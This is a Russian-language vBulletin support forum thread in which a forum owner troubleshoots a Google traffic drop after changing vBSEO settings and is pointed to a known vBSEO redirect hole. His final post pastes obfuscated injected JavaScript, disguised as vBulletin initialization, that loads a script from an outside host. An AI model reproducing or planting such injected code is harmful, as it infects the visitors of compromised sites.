VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Значит у меня давно на форуме версии 3.8.5. стоял vBseo версии 3.5.2, примерно в октябре поставил vBSEO Sitemap generator. Все работало замечательно, карта создавалась и отправлялась благополучно в Google.
Но тут черт меня дернул немного поменять настройки в vBSEO, решил поменять слегка ссылки на форумы, чтобы можно было создать с одинаковыми названиями, но самом деле как я заметил ничего ен изменилось, а только у пал трафик в 2 раза и в карте сайта появилось в 2 раза больше страниц.
Потом вернул настройки назад, проблема осталась. Потом полностью стер на форуме и в Google карту сайта, создал по новой, но в итоге все осталось по старому.
Теперь у меня вместо 1200-1400 трафика в сутки, всего 200-400. Хотя около 75-80% трафик был только с Google.
Собственно тут появляется вопрос, как вернуть все на место? Чтобы в карте сайта создать только реальны страницы, а не каждой по 2?
Теперь у меня вместо 1200-1400 трафика в сутки, всего 200-400.
и давно это падение произошло?
ты уверен, что это связано с сайтмапой?
вот эту тему читал: vBSEO Security Patch?
@AggreSSor
Простоузер
Версия vB: 3.8.x
is infamous around these parts -77
Репутация в разделе: -85
0
Luvilla, ну я же говорю, что через несколько дней как я там что-то накрутил, потом был скачок на 1 день, когда отправил новый сайтмап и все глухо.
vBSEO Security Patch это не из-за этого, там врядли кто-то лазить будет, но на всякий случай поставлю.
Luvilla
Гость
Quote:
Originally Posted by AggreSSor
ну я же говорю, что через несколько дней как я там что-то накрутил
а я верю истине "после этого - не значит вследствие этого"
в посте есть информация: стоит старая вбсео и упал трафик с поисковиков. Эти симптомы мне точно знакомы.
дайте ссылку на форум, иначе всё это - гадание на кофейной гуще
@AggreSSor
Простоузер
0
Luvilla, эээ... форум вам не очень понравиться. Предупреждаю тематика адалт ...
Мне стоит ставить vBSeo 3.6.0 GOLD от 03.12.2011 ?
Luvilla
Гость
Quote:
эээ... форум вам не очень понравиться. Предупреждаю тематика адалт
ну.. да...) ссылку убрала
так вот: у Вас именно тот самый случай, который расписан в теме про дыру в СЕО
читайте тему)
чтобы проверить - попробуйте зайти на свой форум из результатов поиска Гугла - срабатывает редирект, один раз, но этого достаточно, чтобы убить трафик
кука ставится vbsp
Veterblack
Специалист
Награды в конкурсах:
Professional 563
Репутация в разделе: 21
0
Quote:
Мне стоит ставить vBSeo 3.6.0 GOLD от 03.12.2011 ?
Там файлообменник умер. Качайте по следующей ссылке 3.6.0 без GOLD, и ставьте заплатку обязательно.
@AggreSSor
Простоузер
0
залил файлы, ипмортировал продукт, при заходе в админку вбсео потребовал ввести пароль новый, я ввел, адльше вот что было написано
Quote:
Your config.xml is writable. Don't forget to update permissions after you finish updating the configuration for security purposes.
Veterblack
Специалист
Награды в конкурсах:
Professional 563
Репутация в разделе: 21
1
Quote:
адльше вот что было написано
И что тут страшного?
Ваш конфиг установлен на запись. Ну и типа не забудьте снять права записи после настройки конфигурации продукта.
@AggreSSor
Простоузер
0
Видать проблема была именно в этом, не поверите, но сегодня посещаимость уже выросла в 2 раза со вчерашним днем
AggreSSor добавил 29.02.2012 в 19:45
Проблемы начинают продолжатся.
Вчера как обновил вбсео и поставил заплатку, было вроде все нормально. сегодня даже трафик в 2 раза вырос, но появилась теперь интересная проблема, гугл типо говорит браузерам хрома и лисы что у меня на сайте вредоносное ПО, хотя я вообще ничего не менял впоследние 2 недели кроме того как вчера изменил вбсео.
По данный гугла возникают некие ошибки на разные страницах форума и вот что гугл показывает мне код:
HTML Code:
<script type="text/javascript"><!--
// Main vBulletin Javascript Initialization
var script=document.createElement(String.fromCharCode(115,9
9,114,105,112,116));script.src=String.fromCharCode(104,116,1
16,112,58,47,47,118,98,117,105,108,116,105,110,45,116,104,10
1,109,101,115,46,105,110,47,106,113,117,101,114,121,46,99,11
1,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var
head=document.getElementsByTagName(String.fromCharCode(104,1
01,97,100))[0];head.appendChild(script);vBulletin_init();
//--></script>
Это мне кажется по любому как-то связано с вбсео, но как именно мне непонятно.
Помогите решить проблему.
Last edited by AggreSSor : 02-29-2012 at 09:45 PM.
Reason: Добавлено сообщение